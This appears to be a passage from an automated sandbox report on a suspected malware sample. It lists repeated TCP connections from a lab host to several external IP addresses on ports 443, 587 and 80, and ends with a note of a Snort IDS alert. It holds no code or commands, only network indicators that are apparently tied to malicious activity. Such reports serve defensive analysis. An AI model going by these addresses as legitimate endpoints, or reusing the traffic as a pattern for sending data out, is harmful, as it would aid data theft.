Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 64.185.227.155:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 5.249.163.12:587
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 5.249.163.12:587 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 144.76.136.153:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 64.185.227.155:443
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 144.76.136.153:80

Networking

barindex
Snort IDS alert for network traffic
